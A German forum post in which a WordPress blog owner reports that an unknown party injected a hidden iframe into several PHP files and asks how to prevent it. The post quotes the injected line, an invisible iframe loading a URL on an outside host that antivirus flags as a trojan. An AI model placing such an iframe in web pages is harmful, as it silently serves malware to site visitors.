Hoi...
Hab vorhin meinen Blog aufgerufen und nur Php-Fehlermeldungen bekommen. Irgendwas in der index.php soll kaputt sein, was mir die Fehlermeldung grad nicht gemerkt. Hab nachgeguckt und eine Zeile gefunden die ich nie eingefügt habe:
Die war in insgesamt 3 Dateien vorhanden (/index.php, /wp-includes/default-widgets.php und in der index.php meines aktuellen Themes). Nachdem ich die /index.php etwas abgeändert habe kam auch direkt eine Trojanerwarnung von Avira AV.PHP-Code:<iframe src="http://c6p.at:8080/ts/in.cgi?pepsi140" width=125 height=125 style="visibility: hidden"></iframe>
Hab die Zeilen nun alle entfernt und verlorenen Code in den Dateien ersetzt. Mein Problem ist nur, dass das so gestern abend noch nicht da war und somit irgendwer oder irgendwas Zugriff auf meinen Webspace hatte und die Dateien verändern konnte. Google und auch die Supportseite von Wordpress haben mir momentan noch nicht wirklich weitergeholfen, von daher wollte ich hier mal fragen wie ich so etwas vermeiden kann. Hab den Blog erst gestern erstellt, von daher hab ich da noch keinen Schimmer von.
Würde mich sehr über Hilfe freuen, da ich soetwas gerne vermeiden würde.^^
Edit: Wenn weitere Informtionen benötigt werden einfach melden.
Edit2: Korrigiere, es sind (mindestens) 4 Dateien geändert worden. Nachdem ich mich jetzt eingeloggt habe gibt es auch noch eine Fehlermeldung für /wp-admin/index.php... die gleiche Zeile ist mal wieder drin.

LinkBack URL
About LinkBacks